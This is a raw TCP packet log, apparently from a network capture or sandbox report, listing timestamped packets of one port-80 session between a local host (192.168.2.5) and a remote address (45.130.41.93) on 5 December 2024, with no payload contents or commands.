Dec 5, 2024 21:50:13.102185011 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.102894068 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.102999926 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.103271961 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.103734970 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.103826046 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.103849888 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.104121923 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.104607105 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.104701042 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.104758978 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.104758978 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.105499983 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.105537891 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.105564117 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.105621099 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.106367111 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.106460094 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.106482029 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.107290983 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.107415915 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.107439995 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.107505083 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.108144045 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.108233929 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.109004974 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.109101057 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.109124899 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.109421968 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.109884024 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.109987974 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.110012054 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.110735893 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.110846996 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.110858917 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.110980988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.111638069 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.111762047 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.111783981 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.111871004 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.112525940 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.112613916 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.112868071 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.113390923 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.113492966 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.113549948 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.113549948 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.114279032 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.114407063 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.114478111 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.114672899 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.115144968 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.115231037 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.115590096 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.116040945 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.116189957 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.116307974 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.116945028 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.117042065 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.117064953 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.117156982 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.117748022 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.117842913 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.117852926 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.117933035 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.118582010 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.118648052 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.118669987 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.119447947 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.119489908 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.119515896 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.119628906 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.120357037 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.120435953 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.120712042 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.121131897 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.121273994 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.121282101 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.121371984 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.122015953 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.122112989 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.122136116 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.122234106 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.122847080 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.122953892 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.122968912 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.123071909 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.123680115 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.123788118 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.123795986 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.123930931 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.124506950 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.124589920 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.124871969 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.125364065 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.125461102 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.125485897 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.128026962 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.269452095 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.269577026 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.269604921 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.269746065 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.269846916 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.269877911 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.269973993 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.269992113 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.270061016 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.270704031 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.270806074 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.270862103 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.270972013 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.271524906 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.271661997 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.271680117 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.272295952 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.272387028 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.272567034 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.272600889 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.272660971 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.273227930 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.273303032 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.273356915 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.273430109 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.273935080 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.274023056 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.274095058 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.274432898 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.274775982 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.274889946 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.274969101 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.275595903 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.275695086 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.275697947 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.275832891 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.276416063 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.276516914 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.276593924 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.277204990 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.277314901 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.277318001 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.277753115 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.278039932 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.278099060 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.278130054 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.278230906 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.278837919 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.278939962 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.278964996 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.279040098 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.279633999 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.279681921 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.279700994 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.280524015 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.280546904 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.280622005 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.281076908 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.281301975 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.281435966 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.281641960 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.282133102 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.282212973 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.282215118 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.282274961 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.282902956 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.283008099 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.283025980 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.283169031 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.283731937 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.283828974 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.283833027 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.283885956 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.284524918 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.284599066 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.284621000 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.284703970 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.285348892 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.285469055 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.285567999 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.286160946 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.286341906 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.286360025 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.286478043 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.286963940 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.287082911 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.287112951 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.287795067 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.287976980 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.288000107 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.288130999 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.288589001 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.288650036 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.288678885 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.289025068 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.289403915 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.289479971 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.289501905 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.289545059 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.290220022 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.290277004 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.290457964 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.290579081 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.291034937 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.291088104 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.291189909 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.291348934 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.291898012 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.291965008 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.291990042 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.292249918 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.292660952 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.292717934 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.292789936 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.293061972 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.293461084 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.293562889 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.293581009 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.293633938 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.294323921 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.294406891 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.294437885 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.294532061 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.295233011 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.295293093 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.295453072 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.295505047 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.295970917 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.296015978 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.296072960 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.296211958 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.296724081 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.296818972 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.296915054 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.297646046 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.297753096 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.297775030 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.298376083 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.298476934 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.298499107 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.298789024 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.299180031 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.299288034 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.299314976 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.299453020 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.299993992 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.300067902 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.300091982 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.300365925 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.300823927 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.300862074 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.300884008 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.301017046 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.301626921 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.301732063 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.301770926 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.301984072 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.302478075 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.302491903 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.302555084 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.302555084 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.303258896 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.303291082 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.304054976 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.304078102 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.304147959 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.304349899 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.304861069 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.304913998 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.304963112 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.305011988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.305694103 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.305758953 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.305778027 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.306240082 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.306489944 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.306581020 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.306606054 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.306710005 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.307320118 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.307384968 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.307425022 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.307667971 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.308141947 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.308229923 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.308253050 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.308639050 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.308933020 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.309036016 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.309742928 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.309767008 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.309933901 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.310059071 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.310554981 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.310647964 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.311436892 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.311450005 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.311937094 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.461591959 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.461610079 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.461723089 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.461725950 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.461810112 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.461905003 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.461956978 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.462443113 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.462553024 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.462685108 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.463144064 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.463198900 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.463241100 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.463609934 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.463979959 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.464010954 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.464032888 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.464107037 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.464759111 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.464848995 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.464870930 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.464904070 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.465610981 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.465686083 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.465996981 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.466423035 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.466525078 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.466537952 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.466737986 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.467212915 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.467329979 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.467670918 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.468077898 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.468151093 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.468264103 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.468856096 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.468986988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.469008923 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.469077110 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.469655037 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.469736099 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.469763994 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.469830990 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.470448017 CET	80	49710	45.130.41.93	192.168.2.5
